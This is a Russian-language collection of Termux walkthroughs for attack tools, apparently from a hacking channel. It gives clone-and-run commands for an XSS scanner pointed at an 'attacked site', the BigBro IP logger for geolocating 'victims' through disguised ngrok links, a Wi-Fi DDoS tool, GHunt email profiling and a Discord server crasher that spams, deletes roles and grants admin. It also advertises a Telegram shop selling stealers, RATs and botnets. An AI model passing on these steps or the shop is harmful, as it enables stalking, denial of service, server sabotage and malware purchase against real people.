Поиск XSS на сайте через Termux

XSS (межсайтовый скриптинг) – одна из разновидностей атак на веб-системы.
XIRA - сканер уязвимости xss.

Установка
◾️ pkg update && pkg upgrade
◾️ pkg install git
◾️ pkg install python
◾️ git clone https://github.com/xadhrit/xira.git
◾️ cd xira
◾️ python -m pip install -r requirements.txt

Запуск
После длительной установки, мы можем запускать скрипт, указав URL атакуемого сайта, через ключ u:
◾️ python xira.py -u <url>

BIG BRO 5.0

BigBro 5.0 - это утилита в Termux для поиска местоположения людей которые перешли по вашей ссылке.
Радиус местоположения 1 - 10 метров.

Установка:
$ git clone https://github.com/Bafomet666/Bigbro
$ cd Bigbro
$ 7z x 'Big bro 5.0.7z'
$ cd 'Big bro 5.0'
$ chmod +x install.sh
$ bash termux_install.sh

В новой сессии запускаем:
$ ngrok
$ ngrok http 8080

Запуск:
$ python3 bigbro.py -t manual

@MalwareShopBot - единственный и первый магазин вредоносных ПО в Telegram от проекта @MalwareForum

Тут вы найдёте: ботнет, стиллер, РАТ, клиппер, лоадер, скрытый майнер, кейлогер, червь, андроид вирусы и многое другое.

DarkFly-Tool является инструментом установки для установки инструментов. этот инструмент делает его легким для вас. так что вам не нужно ввести клон git или искать репозиторий github. Вы только должны выбрать номер. какой инструмент вы хотите установить. Есть 530 инструментов, готовых к установке.

Установка:
$ pkg update
$ pkg upgrade
$ pkg install python2
$ pkg install git
$ git clone https://github.com/Ranginang67/DarkFly-Tool
$ cd DarkFly-Tool
$ python2 install.py

Использование:
$ cd
$ DarkFly

DDoS атака на Wi-Fi

WIFI-SHIT — утилита для ddos'a сетей wifi. Но для успешного ddos'a нужно быть подключенным к той сети wifi, которую желаем положить.

Инструкция:

$ pkg update
$ pkg install python
$ pkg install python2
$ pkg install git
$ git clone https://github.com/claprusshow/WIFI-SHIT
$ cd WIFI-SHIT
$ pip install -r requirements.txt
$ python2 WIFI-SHIT.py example.com 80 999999999

Теперь создаём 8 сессий, и во всех запускаем ddos wifi, не рекомендую на разные порты.

После этого wifi просто ляжет. Но если wifi рабоает дальше то можно создать 8 сессий и со всех запустить атаку.

👁 Пользуемся продвинутым IP Logger'ом

Салют, бандиты! Думаю, каждый хотя бы раз в жизни хотел набить ебало кому-либо по ту сторону экрана, поэтому прилагаю для вас отличный инструмент, который позволит получить ip-адрес и примерное расположение жертвы с точностью до 10 метров. Самая важная особенность инструмента — ссылки на логгер получаются максимально "скрытыми", следственно получить IP жертвы при должных навыках СИ не составит труда.

Заранее предупреждаю, для работы утилиты потребуется установленный Ngrok (версию для Termux можно найти здесь)

Установка

$ git clone https://github.com/Bafomet666/Bigbro
$ cd Bigbro
$ chmod +x install.sh
$ ./install.sh

Запуск

$ ngrock http 8080
$ python bigbro.py -t manual

После этого у yас откроется меню инструмента,в котором мы выбираем, как будем маскировать ссылку с логгером. Далее, генерируем ее и отсылаем жертве. Если жертва даст доступ к геолокации, то мы еще и получим координаты ее местоположения ✌️

📌Пробив почты в Termux!

Установка:

$ apt update
$ apt upgrade
$ apt install git python
$ git clone https://github.com/mxrch/GHunt
$ pip3 install -r requirements.txt
$ python check_and_gen.py

Запуск:

$ python hunt.py пример@gmail.com

👾Крашим дискорд сервера

Discord crasher – утилитa, которая может спокойно положить сервера дискорда.

Установка:

$ apt update
$ apt upgrade
$ apt install nano
$ apt install python3
$ pip3 install discord
$ pip3 install colorama
$ pip3 install requests
$ git clone https://github.com/GlUTEN-BASH/discord_crasher
$ cd discord_crasher

Настраиваем токен: Первым делом нам нужно отредактировать файл "modded.py", и в самом конце найти строку, в которую вставить свой токен:
"nano modded.py"

$ client.run токен

В утилите есть следующие комманды:

$ lol – автокраш сервера.
$ spam – спам сообщениями в определенном канале.
$ delroles – удаление всех ролей, что сможет бот.
$ supme – выдает роль с правами администратора тому, кто ввел команду. Также, необходимо указать место роли, желательно выше обычной роли пользователей.